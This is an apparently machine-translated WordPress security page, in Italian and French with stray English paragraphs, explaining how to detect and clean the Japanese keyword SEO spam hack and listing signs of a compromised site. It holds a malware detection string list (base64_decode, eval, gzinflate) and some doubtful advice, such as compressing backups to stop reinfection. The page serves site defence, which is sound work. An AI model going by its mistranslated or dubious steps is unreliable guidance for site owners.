Correzione dell’hack di spam SEO giapponese in WordPress

Cos’è un hack di parole chiave giapponese

Si tratta di un hack legato allo spam in cui gli hacker iniettano parole giapponesi nel titolo e nella descrizione del tuo sito WordPress mentre manipola la proprietà del tuo sito Google Search Console e le eventuali sitemap inviate. Il motore di ricerca di solito finisce per scegliere quello dell’immagine qui sopra. Gli hacker approfittano di questo tipo di malware inserendo link ad altri siti nelle vostre pagine, che sono collegati al loro ID affiliato, ingannando i vostri visitatori e reindirizzandoli verso siti che vendono merce di marca falsa a metà del prezzo originale. Ogni volta che qualcuno acquista un prodotto da quei siti, l’hacker riceverà una commissione per la vendita.

Come trovare se il vostro sito è infettato dal pirata informatico giapponese

Passo 1: Controllare i risultati dei motori di ricerca di Google

Poiché questo hackeraggio è visibile solo dai motori di ricerca che identificano le pagine infette nel vostro sito web WordPress, non è un compito facile. Un modo per individuare l’hack è quello di eseguire una query di ricerca in Google per il tuo dominio, ad esempio “yourdomain.com” o “site:yourdomain.com” e vedere se i risultati mostrano qualche parola giapponese nel titolo e nella descrizione del tuo sito.

Fase 2: Controlla la tua Google Search Engine Console per verificare l’eventuale presenza di malware

La maggior parte dei nostri clienti che ci chiedono di pulire il loro sito WordPress violato hanno scoperto l’hackeraggio giapponese dopo aver ricevuto un avviso nel loro account Google Search Console, simile a quello trovato qui sotto:

“Google ha rilevato che il vostro sito è stato violato da una terza parte che ha creato contenuti dannosi, inaspettati o nocivi su alcune delle vostre pagine. Questo problema influisce sulla reputazione del vostro sito mostrando i contenuti hackerati sul vostro sito o nei risultati di ricerca. Vi raccomandiamo di rimuovere il contenuto violato dal vostro sito il prima possibile. Una volta rimossi, il nostro sistema rifletterà automaticamente questi cambiamenti man mano che aggiorneremo il nostro indice.
Di seguito sono riportati alcuni URL di esempio. Esaminateli per avere un’idea più chiara di dove appare questo contenuto hackerato e di come può essere stato inserito sul vostro sito web. L’elenco non è esaustivo”.

Anche se non avete mai ricevuto un messaggio di questo tipo, dovete visitare la pagina dei problemi di sicurezza con il vostro SGC e vedere se c’è qualche avviso presente.

Fase 3: Controllo dell’occultamento dell’URL

In the previous Step, we asked you to check Google’s search engine results for your domain, if you followed any of those spammy links from your site and got redirected to your site 404 default page then you need to make sure this link isn’t cloaked. URL cloaking shows a different version of your page to the search engines and real human visitors. This way you will see that your site contains the Japanese hack in Google’s search engine results but if you try and visit that page you will be redirected to a not found page. Once more you can use Google Search Console and it’s “Fetch as Google” tool which lets you see if the requested URL is cloaked or not.

If you ever find yourself in this position then you must clean your site as soon as possible because Google will blacklist your website and your site visitors won’t be able to find it in Google’s search engine results nor visit it through their Chrome browsers. The longer you leave the hack in your website the bigger the damage.

Come pulire l’hack di parola chiave giapponese WordPress

Considerando che il vostro fornitore di hosting non può aiutarvi a rimuovere il malware spam giapponese, allora dovete agire e rimuovere l’hacker pulendo il vostro sito web WordPress. Di seguito alleghiamo una semplice guida che può aiutarvi a individuare e rimuovere tali malware. Tenete presente, però, che se non siete abbastanza esperti nella pulizia del malware potreste non essere in grado di pulire completamente il vostro sito WordPress.

Passo 1: Creare un backup del sito e archiviarlo comprimendo

Utilizzate il vostro pannello di hosting e create un backup del vostro sito live, assicuratevi che il file di backup sia compresso (per esempio un file zip) in modo che il malware non possa ricominciare a infettare il sito una volta pulito.

Fase 2: Controlla la tua console per i motori di ricerca Google

Accedi alla tua Google Search Engine Console e naviga fino alla pagina delle sitemap, cancella qualsiasi sitemap che non sia stata inviata da te. Devi anche dare un’occhiata agli utenti che hanno accesso a questa proprietà del sito e rimuovere eventuali Proprietari o Utenti non creati da te.

Passo 3: Pulire il file .htaccess


Utilizzate il vostro Hosting Panel File Manager o un client FTP come Filezilla e navigate nella directory principale del vostro sito WordPress. Lì dovresti vedere un file con il nome .htaccess, accedervi e vedere se ci sono delle regole strane. Se non siete esperti nel lavorare con .htaccess, cancellatelo e createne uno nuovo con lo stesso nome. Poi aggiungete le regole predefinite di WordPress htaccess e salvatelo.

Passo 4: Copiare le stringhe di connessione del vostro database di configurazione WordPress


Un altro file importante che gli hacker amano prendere di mira e iniettare malware è il file di configurazione di WordPress: wp-config.php. Gli utenti esperti di WordPress possono sfogliarne il contenuto e cancellare quelli che non sembrano appartenere ai contenuti predefiniti di wp-config.php. Se non volete avere problemi con la modifica di questo importante file WordPress, allora vi suggerisco di copiare le stringhe di connessione del vostro database WordPress e di incollarle all’interno di wp-config-sample.php sostituendo quelle di default. Poi andate a cancellare il file wp-config.php e rinominate wp-config-sample.php in wp-config.php.

Passo 5: Sostituire i file principali di WordPress


Il modo migliore e più sicuro per pulire un’infezione da hacker o malware è quello di cancellare tutti i file del sito e di ricaricarli appena scaricati da WordPress.org. Dopo aver scritto la versione di WordPress che il vostro sito sta utilizzando, cancellate tutti i file di root di WordPress e le directory principali di WordPress. Poi scaricate la versione di WordPress che il vostro sito utilizzava da WordPress.org e caricate tutti i file e i dirs che avete cancellato.

Passo 6: Sostituire tutti i temi e i plugin di WordPress


In questa fase, si ripeterà il processo di sostituzione di tutti i temi e i plugin di WordPress. Dovete prima scrivere tutti i loro nomi e le loro versioni, poi scaricarli da WordPress.org o da qualsiasi altro sito che avete trovato per la prima volta. Infine, cancellare tutti i temi e i plugin attuali e caricare quelli appena scaricati. Dovresti anche sostituire il tuo file wp-content/index.php con quello di default.

Passo 7: Controlla i tuoi upload dir


Sfoglia la tua directory wp-content/uploads per qualsiasi file .php, .js e .ico. Ogni volta che ne trovate uno controllate se ha un nome di file strano e se la sua data di creazione è recente, controllate anche il suo contenuto per trovare caratteri e stringhe strane come “base64_decode, rot13, eval, strrev, gzinflate”. Se trovate un file di questo tipo, cancellatelo. Tenete presente che le directory dei vostri file multimediali sotto wp-content/upload non dovrebbero contenere file .php, .js o .ico, quindi se ne trovate qualcuno cancellatelo subito.

Fase 8: Chiedi a Google di riesaminare il tuo sito


Una volta finito vi suggerisco di monitorare le modifiche ai file apportate al vostro sito per il giorno successivo, quindi di controllarle, e se sembrano legittime chiedete a Google dalla vostra console di ricerca di riconsiderare il vostro sito. Dopo qualche giorno, vi invieranno una risposta e, si spera, inseriranno nuovamente il vostro sito nella whitelist.

Come rimuovere le pagine hackerate giapponesi dall’indice di Google

Il più delle volte un sito WordPress infettato dal Japanese Spam Malware ha già una tonnellata di quelle pagine hackerate indicizzate da Google. Anche se il vostro sito WordPress è ora pulito, dovete comunque aspettare che Google lasci cadere quelle pagine hackerate. Se non volete aspettare e mettere a rischio la reputazione del vostro sito e del vostro marchio, dovreste procedere e chiedere a Google di rimuovere gli URL delle pagine hackerate usando il loro URL Removal Tool sotto la vostra Google Search Console.

Pulendo così tanti siti WordPress infettati dal Japanese Spam Hack abbiamo creato una procedura specifica da seguire per chiedere a Google di deindicizzare e rimuovere le vostre pagine giapponesi violate. Anche se si tratta di una procedura semplice, dovete stare molto attenti a non finire per rimuovere tutte le pagine del vostro sito dall’indice di Google.

1.Rimuovere manualmente le pagine hackerate da Google

Passo 1: Cerca su Google le pagine indicizzate del tuo sito utilizzando il sito:yoursite.com
Fase 2: Sfogliare tutti i risultati della ricerca e annotare tutti gli URL delle pagine giapponesi violate in un file CSV

Fase 3: Accedi alla tua console di ricerca Google e visita la pagina dello strumento di rimozione dell’URL

Fase 4: Inviare ciascuna di queste pagine di spam giapponese nello strumento Rimuovi contenuto obsoleto e richiedere la rimozione

Se le vostre pagine indicizzate con lo spam contengono “index.php” come parte del loro permalink, allora dovete inviare due volte i suoi URL con e senza index.php.

A Google bastano poche ore per iniziare a rimuovere gli URL inviati.

2.Rimuovere automaticamente le pagine hackerate da Google

Se il tuo sito WordPress violato ha più pagine di spam giapponese indicizzate da Google di quanto tu possa gestire, allora ti suggeriamo di dare un’occhiata alla nostra guida alla rimozione automatica delle pagine di spam che si trova qui sotto. Questa guida deve essere seguita con attenzione perché qualsiasi mossa sbagliata può mettere a rischio gli sforzi di SEO del tuo sito.

Se non vi sentite a vostro agio nell’utilizzare questa guida e avete ancora bisogno di rimuovere le vostre pagine giapponesi violate dai risultati di ricerca di Google, allora vi suggeriamo di dare un’occhiata ai nostri servizi di rimozione malware per i siti WordPress.

Passo 1: Visita il tuo rapporto di copertura della console di ricerca Google

Passo 2: Selezionare l’opzione Pagine Valide

Fase 3: Visita la pagina indicizzata, non presentata nella mappa del sito e richiedi di scaricare un elenco di tali URL come file CSV

Fase 4: Duplicare il file CSV e togliere il permalink “index.php” per ogni singolo URL che lo contiene

Quindi ora dovreste avere due file CSV, il primo sarà il CSV di default come scaricato dalla vostra console di Google mentre il secondo sarà lo stesso ma senza il permalink index.php per ogni URL.

Questo è necessario perché anche se Google ha indicizzato la pagina Hacked giapponese usando il file index.php, per esempio, https://yoursite.com/index.php/hd5jhuyuiy/9h_jgfd-swkj se visitate quella pagina (e bypassate il vostro avviso antivirus) allora sarete reindirizzati ad una pagina simile ma senza il index.php nel suo permalink, per esempio, https://yoursite.com/hd5jhuyuiy/9h_jgfd-swkj. Questo significa che dovete chiedere a Google di rimuovere sia la pagina di spam indicizzata che il suo reindirizzamento.

Passo 5: Scaricare e installare l’estensione di rimozione dell’URL di massa per Google Chrome

In Github c’è un’estensione pulita di Google Chrome per la rimozione di contenuti obsoleti di Google Search Index in massa, che vi aiuterà ad automatizzare il processo di rimozione. È necessario installare manualmente questa estensione mentre si utilizza la modalità Developer Chrome, se vi sembra giapponese, seguite il nostro screencast qui sotto:

Passo 6: caricare il file CSV nel Content Removal Tool di Google

Durante l’accesso alla tua Google Search Console visita la pagina di rimozione dei contenuti obsoleti e utilizza l’opzione “Carica il tuo file” che è stata aggiunta dopo aver installato l’estensione di rimozione dei contenuti in blocco per caricare il CSV con la tua lista di URL “indicizzati, non inviati nella mappa del sito”. Assicuratevi di eseguire la procedura due volte, una per ogni file CSV.

Avviso:

Questo tutorial deve essere seguito con attenzione, altrimenti il vostro sito potrebbe avere problemi di caricamento. Siate consapevoli, tuttavia, che la pulizia del malware attraverso un tutorial potrebbe non portare al successo per tutto il tempo, poiché ci sono molte altre cose che non possono essere visualizzate in un tutorial da prendere in considerazione quando si pulisce un sito WordPress. Se non vi sentite a vostro agio nella vostra capacità di pulire il vostro sito WordPress, allora sentitevi liberi di richiedere un preventivo da parte nostra per la rimozione dell’hackeraggio delle parole chiave giapponesi dal vostro sito WordPress.

Infetto da Pharma Hack?

Se il tuo sito WordPress è stato infettato dal Pharma Hack Spam Malware, allora ti suggeriamo di dare un’occhiata alla nostra recente guida su come rilevare, pulire e proteggere il tuo sito WordPress dal Pharma Hack.

10 signes indiquant que votre site WordPress est piraté

Signes avant-coureurs d’un site WordPress piraté

Les sites WordPress sont connus pour être piratés. Il existe une idée fausse très répandue selon laquelle WordPress est défectueux et facile à pirater. La vérité est que WordPress est le CMS le plus populaire, alimentant près de 40% de tous les sites du web. On peut donc s’attendre à ce que les pirates informatiques la ciblent le plus souvent, statistiquement.

Même si les opposants se trompent, la menace est réelle. Il se peut que vous rencontriez des problèmes ou que vous remarquiez des choses bizarres sur votre site et que vous soupçonniez qu’il soit compromis. S’il est parfois facile de repérer un site WordPress piraté, il arrive que le malware ne soit pas si évident.

Voici une liste de signes qui, s’ils sont présents, peuvent signifier que votre site WordPress a été piraté.

1.Page d’accueil défigurée

C’est l’un des signes les plus évidents montrant que quelqu’un a piraté votre site. C’est ce que font les pirates informatiques pour se faire un nom. Dans la plupart des cas, la vantardise n’est pas la principale intention du pirate. Ce qu’ils veulent faire, c’est tirer profit de votre trafic. Mais dans certains cas, ils le font juste pour le plaisir et la notoriété.

Quelle que soit l’intention, cela signifie toujours que quelqu’un a le contrôle de votre site. La dégradation aura un impact négatif sur votre réputation, entraînant une baisse du trafic et, naturellement, une perte de revenus.

2.Votre site redirige vos visiteurs

Les redirections malveillantes peuvent se présenter sous de nombreuses formes. Parfois, les pirates insèrent des liens sur les pages, d’autres fois ils insèrent des scripts qui redirigent vos visiteurs dès qu’ils essaient de charger le site. Selon le scénario, des redirections peuvent arriver à ceux qui utilisent des appareils mobiles et ne redirigent pas les autres.

Bien qu’il puisse être difficile à repérer, dans la plupart des cas, il est vraiment simple à reproduire. Il suffit de visiter votre site WordPress piraté alors que vous êtes déconnecté et de voir si votre site vous redirige vers un autre site. Si vous arrivez sur une autre page, il est probable que vous verrez une fenêtre contextuelle indiquant que votre ordinateur est infecté par un logiciel malveillant. De plus, la fenêtre contextuelle aura la possibilité de télécharger un logiciel de suppression de logiciels malveillants qui est en fait un logiciel malveillant lui-même, sous une forme déguisée.

Selon l’expérience que vos visiteurs ont du web, certains peuvent être la proie d’un pirate s’ils téléchargent un logiciel à partir de la page vers laquelle ils sont redirigés. C’est pourquoi il est important de traiter cette question rapidement.

3.Le trafic diminue soudainement

Si vous utilisez Google Analytics, vous pourriez remarquer une baisse soudaine des statistiques de trafic. Ceci est le résultat de logiciels malveillants qui redirigent vos visiteurs vers des sites de spam. De plus, si votre site est marqué comme dangereux sur Google ou même sur une liste noire, il faut alors savoir clairement pourquoi les gens évitent votre site.

4.Impossible de se connecter à votre tableau de bord WordPress

C’est un symptôme délicat. Parfois, il peut arriver que nous soyons absolument sûrs du mot de passe et que nous commencions à penser que quelqu’un l’a changé. Je suis passé par là. J’ai oublié que j’ai mis une majuscule ici et un point là, un caractère spécial à la fin et ainsi de suite.

Cependant, si vous êtes absolument certain de votre mot de passe, que vous ne l’avez pas changé et que personne d’autre n’a eu accès à votre mot de passe pour le changer, cela peut signifier que quelqu’un a piraté votre compte administrateur. Cela signifie également que les pirates informatiques pourront créer des utilisateurs supplémentaires, modifier la présentation du site et faire beaucoup plus de dégâts si cette situation n’est pas traitée correctement et rapidement.

5.Administrer des comptes qui ne devraient pas être là

If you notice that there’s an admin user that you cannot recall adding, this is a big warning sign. Again, it can happen that we forgot that we granted admin privileges to a new team member, but if you are certain that’s not the case, you are looking at a hacker’s admin user.

But, suspicious admin users are not the only ones you should be concerned with. If you are using an outdated plugin that has a vulnerability, admin can create countless numbers of subscribers and grant them admin privileges. In that sense, that user is equal to the super-admin and can do whatever they please.

6.Un site web lent ou peu réactif

C’est l’un de ces signes incertains. Les gens ont tendance à remplir leurs sites de dizaines de plugins, dont certains sont connus pour solliciter les ressources du serveur, ce qui n’est pas forcément un signe fiable que quelqu’un a piraté votre site.

Cependant, si vous n’avez fait aucune modification et que votre site devient lent et ne répond plus du jour au lendemain, vous pourriez être victime d’une attaque dite DDoS. DDoS signifie “Distributed Denial of Service” (déni de service distribué). En gros, ce type d’attaque utilise un réseau d’ordinateurs avec de fausses adresses IP qui envoient d’innombrables requêtes à votre serveur. Une fois que les attaquants ont inondé le serveur d’un nombre suffisant de requêtes, celui-ci commence à faire des pépins et devient incapable de répondre à la fin.

7.Les e-mails générés sur votre site sont bloqués

De nombreux administrateurs de WordPress utilisent des formulaires de contact pour interagir avec leurs visiteurs. Souvent, les formulaires envoient des notifications par courrier électronique depuis le site en utilisant le serveur de messagerie par défaut. Les pirates informatiques piratent souvent les sites avec l’intention d’utiliser les serveurs de messagerie pour le spam. Si vous remarquez que vous ne recevez pas les courriels générés sur votre site, appelez votre hébergeur. S’il vous dit qu’il vous a bloqué à cause du spam et que vous êtes sûr de ne pas avoir enfreint les limites quotidiennes de courrier électronique, cela est préoccupant.

Parfois, les hébergeurs effectuent des analyses quotidiennes ou hebdomadaires des logiciels malveillants. Dans ce cas, ils vous contactent immédiatement et vous informent que votre site WordPress a été piraté et suspendu de leur service.

8. Fichiers ou répertoires étranges sur votre site

Si vous ne l’avez pas déjà fait après avoir lu les étapes ci-dessus, c’est le moment idéal. Accédez à votre serveur en utilisant le FTP (ou le gestionnaire de fichiers si disponible) et vérifiez votre répertoire racine WordPress.

Selon le degré de sophistication du piratage, vous ne verrez peut-être rien d’étrange si vous ne creusez pas assez profondément. Vous devriez commencer par vérifier les fichiers suivants :

  • .htaccess
  • wp-config.php
  • index.php

Si vous voyez un code qui ressemble à un chiffre ou quelque chose de similaire, cela signifie que quelqu’un a modifié ces fichiers. Parfois, les pirates informatiques tentent de masquer les fichiers en leur donnant des noms similaires à ceux que l’on trouve normalement dans une installation WordPress ou dans un plugin ou un thème WordPress.

Souvent, les fichiers qui ont des noms génériques comme admin.class.php, admin.old.php ou qui peuvent être des fichiers malveillants. Ces fichiers doivent être supprimés afin d’empêcher le piratage. Souvent, cela ne suffit pas car cela signifie qu’il existe une porte dérobée que les pirates utilisent pour télécharger ou modifier des fichiers sur votre site. Ils peuvent simplement réajouter les fichiers après que vous les ayez supprimés et continuer là où ils se sont arrêtés.

C’est en fait l’un des signes les plus forts d’un site WordPress piraté, vous devez donc lancer la procédure de nettoyage dès que possible.

9.Résultats de recherche détournés

L’un des piratages les plus sophistiqués consiste à pirater les résultats de recherche. Qu’est-ce que cela signifie ? C’est un type de piratage qui vise les moteurs de recherche. Lorsque quelqu’un tape votre nom de domaine sur Google ou d’autres moteurs de recherche, il obtient des résultats de recherche contenant votre page d’accueil et toutes les autres pages indexées.

C’est ce qu’on appelle un piratage SEO. Ce hack va insérer un lien vers un site spammé, une pharmacie en ligne ou une autre page indésirable parmi la liste des pages légitimes de votre site. Parmi les spams les plus courants de WordPress, on trouve le “Japanese Keyword Hack” et le “Pharma Hack”.

Il est assez facile de vérifier l’apparence de vos résultats de recherche, quelle que soit la qualité de votre classement dans Google. Allez sur Google et tapez “site:votredomaine.com” dans la barre de recherche. Il va sans dire que vous devez remplacer “votredomaine.com” par votre nom de domaine réel.

Les résultats de la recherche ne doivent afficher que les pages de votre site. Si vous remarquez que certaines pages proposent des produits pharmaceutiques ou tout autre chose qui n’a rien à voir avec votre site, cela signifie que vous êtes victime du piratage de l’OMR.

Le problème majeur est que ce piratage est généralement invisible pour vous ou vos visiteurs. Il peut s’écouler des mois avant que vous ou quelqu’un d’autre ne le découvre. Il peut être très difficile à supprimer définitivement car il sera le plus souvent astucieusement dissimulé dans vos fichiers et votre base de données.

Un service professionnel de suppression des logiciels malveillants devrait peut-être s’en charger pour vous.

10. Écran blanc de la mort (WSOD)

J’ai gardé celui-ci pour la fin car ce n’est pas toujours le signe que quelqu’un a piraté votre site. Souvent, un écran blanc de mort sera le résultat d’un échec de mise à jour de plugin, de thème ou de noyau, de conflits plugin/thème ou quelque chose de similaire.

Cependant, si vous voyez un écran blanc de mort lorsque vous essayez d’accéder à wp-admin, alors cela peut tout aussi bien signifier qu’il y a un logiciel malveillant sur le site. Les scripts de logiciels malveillants peuvent contenir un code qui empêche l’affichage d’erreurs, de sorte qu’au lieu de voir une liste d’erreurs, vous verrez simplement une page blanche.

Comment identifier et réparer le piratage des mots-clés japonais

Qu’est-ce qu’un piratage de mots-clés japonais 

Il s’agit d’un piratage lié au spam où les pirates injectent des mots japonais dans le titre et la description de votre site WordPress pendant qu’il manipule la propriété de votre site de la console de recherche Google et tout plan de site soumis. Le moteur de recherche finit généralement par choisir celui qui figure dans l’image ci-dessus. Les pirates informatiques profitent de ce type de logiciel malveillant en insérant dans vos pages des liens vers d’autres sites, qui sont liés à leur numéro d’affilié, en trompant vos visiteurs et en les redirigeant vers des sites qui vendent de la marchandise de marque contrefaite à la moitié du prix d’origine. Chaque fois qu’une personne achète un produit sur ces sites, le pirate informatique reçoit une commission pour la vente.

Comment savoir si votre site est infecté par le mot-clé japonais hack 

Étape 1 : Vérifier les résultats du moteur de recherche Google

Comme ce piratage n’est visible que par les moteurs de recherche, identifier les pages infectées de votre site WordPress n’est pas une tâche facile. Une façon de repérer le piratage consiste à lancer une recherche dans Google pour votre domaine, par exemple “votredomaine.com” ou “site:votredomaine.com”, et de voir si les résultats affichent des mots japonais dans le titre et la description de votre site.

Étape 2 : Vérifiez dans votre console du moteur de recherche Google si des sanctions sont prévues pour les logiciels malveillants

La plupart de nos clients qui nous demandent de nettoyer leur site WordPress piraté ont découvert le piratage japonais après avoir reçu un avertissement dans leur compte Google Search Console, similaire à celui que vous trouverez ci-dessous :

“Google a détecté que votre site a été piraté par un tiers qui a créé un contenu malveillant, inattendu ou nuisible sur certaines de vos pages. Ce problème affecte la réputation de votre site en montrant le contenu piraté sur votre site ou dans les résultats de recherche. Nous vous recommandons de retirer le contenu piraté de votre site dès que possible. Une fois retiré, notre système reflétera automatiquement ces changements au fur et à mesure que nous mettrons à jour notre index.

Vous trouverez ci-dessous quelques exemples d’URL. Passez-les en revue pour avoir une meilleure idée de l’endroit où ce contenu piraté apparaît, et de la manière dont il a pu être placé sur votre site web. La liste n’est pas exhaustive”.

Même si vous n’avez jamais reçu un tel message, vous devez visiter la page des questions de sécurité de votre SGC et voir s’il y a un avertissement.

Étape 3 : Vérifier le masquage des URL 

Dans l’étape précédente, nous vous avons demandé de vérifier les résultats du moteur de recherche Google pour votre domaine. Si vous avez suivi l’un de ces liens spammy depuis votre site et avez été redirigé vers la page par défaut de votre site 404, vous devez vous assurer que ce lien n’est pas masqué. L’occultation d’URL montre une version différente de votre page aux moteurs de recherche et aux vrais visiteurs humains. De cette façon, vous verrez que votre site contient le piratage japonais dans les résultats du moteur de recherche Google, mais si vous essayez de visiter cette page, vous serez redirigé vers une page introuvable. Une fois de plus, vous pouvez utiliser la console de recherche Google et son outil “Fetch as Google” qui vous permet de voir si l’URL demandée est masquée ou non.

Si jamais vous vous trouvez dans cette situation, vous devez nettoyer votre site dès que possible car Google mettra votre site sur liste noire et les visiteurs de votre site ne pourront pas le trouver dans les résultats du moteur de recherche Google ni le visiter via leur navigateur Chrome. Plus vous laissez le hack sur votre site web longtemps, plus les dégâts seront importants.

Comment nettoyer le piratage des mots-clés japonais de WordPress 

Étant donné que votre fournisseur d’hébergement ne peut pas vous aider à supprimer le logiciel malveillant japonais, vous devez agir et supprimer le piratage en nettoyant votre site WordPress. Nous joignons ci-dessous un guide simple qui peut vous aider à repérer et à supprimer ces logiciels malveillants. Gardez cependant à l’esprit que si vous n’avez pas assez d’expérience dans le nettoyage des logiciels malveillants, vous ne pourrez peut-être pas nettoyer entièrement votre site WordPress.

Étape 1 : Créez une sauvegarde de votre site et archivez-la en la compressant 

Utilisez votre panneau d’hébergement et créez une sauvegarde de votre site en direct, assurez-vous que le fichier de sauvegarde est compressé (par exemple un fichier zip) afin que les logiciels malveillants ne puissent pas recommencer à infecter le site une fois qu’il est propre.

Étape 2 : Vérifiez votre console du moteur de recherche Google 

Connectez-vous à la console du moteur de recherche Google et naviguez jusqu’à la page des plans du site, supprimez tout plan du site que vous n’avez pas soumis. Vous devez également consulter les utilisateurs qui ont accès à la propriété de ce site et supprimer tout propriétaire ou utilisateur que vous n’avez pas créé.

Étape 3 : Nettoyez votre fichier .htaccess 

Utilisez le gestionnaire de fichiers de votre panneau d’hébergement ou un client FTP comme Filezilla et naviguez jusqu’au répertoire racine de votre site WordPress. Vous devriez y voir un fichier sous le nom .htaccess, accédez à ce fichier et voyez s’il n’y a pas de règles bizarres. Si vous n’avez pas l’habitude de travailler avec .htaccess, supprimez-le et créez-en un nouveau en utilisant le même nom. Ajoutez ensuite les règles htaccess par défaut de WordPress et enregistrez le fichier.

Étape 4 : Copiez les chaînes de connexion de votre base de données de configuration WordPress 

Un autre fichier important que les pirates aiment cibler et injecter des logiciels malveillants est votre fichier de configuration WordPress : wp-config.php. Les utilisateurs expérimentés de WordPress peuvent parcourir son contenu et supprimer ceux qui ne semblent pas faire partie du contenu par défaut de wp-config.php. Si vous ne voulez pas vous embêter à modifier cet important fichier WordPress, je vous suggère de copier les chaînes de connexion à votre base de données WordPress et de les coller dans le fichier wp-config-sample.php en remplaçant les chaînes par défaut. Ensuite, allez supprimer le fichier wp-config.php et renommez wp-config-sample.php en wp-config.php. 

Étape 5 : Remplacer vos fichiers WordPress de base 

Le meilleur moyen de nettoyer une infection par un hack ou un malware est de supprimer tous les fichiers de votre site et de les télécharger à nouveau à partir de WordPress.org. Après avoir noté la version de WordPress que votre site utilise, supprimez tous les fichiers et répertoires de base de WordPress. Ensuite, téléchargez la version de WordPress que votre site utilisait sur WordPress.org et téléchargez tous les fichiers et répertoires que vous avez supprimés.

Étape 6 : Remplacez tous vos thèmes et plugins WordPress 

Au cours de cette étape, vous répéterez le processus de remplacement de tous vos thèmes et plugins WordPress. Vous devez d’abord noter tous leurs noms et versions, puis les télécharger sur WordPress.org ou sur tout autre site où vous les avez trouvés pour la première fois. Enfin, supprimez tous les répertoires des thèmes et plugins actuels et téléchargez ceux que vous venez de télécharger. Vous devez également remplacer votre fichier wp-content/index.php par le fichier par défaut.

Étape 7 : Vérifiez votre répertoire de téléchargement 

Parcourez votre répertoire wp-content/uploads pour trouver des fichiers .php, .js et .ico. Chaque fois que vous en trouvez un, vérifiez s’il porte un nom de fichier bizarre et si sa date de création est récente, vérifiez également s’il contient des caractères et des chaînes de caractères bizarres comme “base64_decode, rot13, eval, strrev, gzinflate”. Si vous trouvez un tel fichier, supprimez-le. Gardez à l’esprit que vos répertoires de fichiers multimédia sous wp-content/upload ne doivent pas contenir de fichiers .php, .js ou .ico, donc si vous en trouvez, supprimez-les immédiatement.

Étape 8 : Demandez à Google de réexaminer votre site 

Une fois que vous avez terminé, je vous suggère de surveiller les modifications apportées aux fichiers de votre site pour le lendemain, puis de les vérifier et, si elles semblent légitimes, de demander à Google, à partir de votre console de recherche, de reconsidérer votre site. Au bout de quelques jours, ils vous enverront une réponse et, espérons-le, inscriront à nouveau votre site sur la liste blanche.

Comment supprimer vos pages japonaises piratées de l’index Google 

La plupart du temps, un site WordPress infecté par le Spam Malware japonais possède déjà une tonne de ces pages piratées indexées par Google. Même si votre site WordPress est maintenant propre, vous devez attendre que Google supprime ces pages piratées. Si vous ne voulez pas attendre et mettre en danger la réputation de votre site et de votre marque, vous devez demander à Google de supprimer les URL des pages piratées à l’aide de son outil de suppression d’URL situé sous votre console de recherche Google.

En nettoyant un si grand nombre de sites WordPress infectés par le Spam Hack japonais, nous avons créé une procédure spécifique que vous pouvez suivre pour demander à Google de désindexer et de supprimer vos pages japonaises piratées. Même s’il s’agit d’une procédure simple, vous devez être très prudent afin de ne pas finir par supprimer toutes les pages de votre site web de l’index de Google. 

1. Supprimer manuellement les pages piratées de Google 

  • Étape 1 : Recherchez dans Google les pages indexées de votre site en utilisant site:yoursite.com 
  • Étape 2 : Parcourez tous les résultats de recherche et notez toutes les URL des pages piratées en japonais dans un fichier CSV 
  • Étape 3 : Connectez-vous à votre console de recherche Google et visitez la page de l’outil de suppression d’URL
  • Étape 4 : Soumettre chacune de ces pages de spam japonaises dans l’outil de suppression de contenu obsolète et demander le retrait

Si vos pages indexées par le spam contiennent “index.php” comme partie de leur permalien, vous devez soumettre ses URL deux fois avec et sans index.php.

Google n’a besoin que de quelques heures pour commencer à supprimer les URL soumises.

2. Supprimer automatiquement les pages piratées de Google 

Si votre site WordPress piraté comporte plus de pages de spam en japonais indexées par Google que vous ne pouvez en traiter, nous vous suggérons de consulter notre guide de suppression automatique des pages de spam, que vous trouverez ci-dessous. Ce guide doit être suivi avec attention car toute erreur peut compromettre les efforts de référencement de votre site.

Si vous ne vous sentez pas à l’aise pour utiliser ce guide et que vous devez quand même supprimer vos pages piratées en japonais des résultats de recherche Google, nous vous suggérons de consulter nos propres services de suppression des logiciels malveillants pour les sites WordPress.

  • Étape 1 : Consultez votre rapport de couverture de la console de recherche Google
  • Étape 2 : Sélectionnez l’option “Pages valides
  • Étape 3 : Visitez la page indexée, non soumise dans le plan du site et demandez à télécharger une liste de ces URL sous forme de fichier CSV
  • Étape 4 : Dupliquer le fichier CSV et supprimer le permalien “index.php” pour chacune des URL qui le contient

Vous devriez donc maintenant avoir deux fichiers CSV, le premier sera le CSV par défaut tel que téléchargé depuis votre Google Console tandis que le second sera le même mais sans le permalien index.php pour chaque URL.

Cela est nécessaire car même si Google a indexé la page japonaise piratée à l’aide du fichier index.php, par exemple https://yoursite.com/index.php/hd5jhuyuiy/9h_jgfd-swkj, si vous visitez cette page (et contournez votre avertissement antivirus), vous serez redirigé vers une page similaire mais sans le fichier index.php dans son permalien, par exemple https://yoursite.com/hd5jhuyuiy/9h_jgfd-swkj. Cela signifie que vous devez demander à Google de supprimer à la fois la page de spam indexée et sa redirection.

Étape 5 : Télécharger et installer l’extension de suppression d’URL en masse pour Google Chrome 

Il existe une extension Google Chrome dans Github pour supprimer en masse les contenus obsolètes de l’index de recherche Google, ce qui vous aidera à automatiser le processus de suppression. Vous devez installer manuellement cette extension en utilisant le mode Developer Chrome. Si cela vous semble être du japonais, suivez notre screencast ci-dessous : 

Étape 6 : Charger le fichier CSV dans l’outil de suppression de contenu de Google 

Lorsque vous êtes connecté à votre console de recherche Google, visitez la page Suppression du contenu obsolète et utilisez l’option “Télécharger votre fichier” qui a été ajoutée après l’installation de l’extension de suppression de contenu en masse afin de télécharger le CSV avec votre liste d’URL “indexées, non soumises dans le plan du site”. Veillez à exécuter la procédure deux fois, une fois pour chaque fichier CSV.

Une fois que le CSV a été soumis, l’extension commencera automatiquement à soumettre les URLs de la liste.

Chaque URL soumise sera analysée et fera l’objet d’une demande de suppression automatique.

Si la soumission réussit, vous recevrez un avis comme celui qui est présenté ci-dessous :

Si l’une des URL à supprimer a déjà été soumise, un avertissement apparaîtra, vous pouvez le contourner en sélectionnant l’option “Annuler”. Dans ce cas, l’extension continuera à soumettre l’URL suivante dans la liste.

Avis :

Ce tutoriel doit être suivi attentivement, sinon votre site pourrait avoir des problèmes de chargement. Sachez toutefois que le nettoyage des logiciels malveillants par le biais d’un tutoriel peut ne pas toujours être couronné de succès, car il y a beaucoup d’autres choses qui ne peuvent pas être affichées dans un tutoriel et qu’il faut prendre en compte lors du nettoyage d’un site WordPress. Si vous ne vous sentez pas à l’aise dans votre capacité à nettoyer votre site WordPress, alors n’hésitez pas à nous demander un devis pour la suppression du piratage par mot-clé japonais de votre site WordPress.

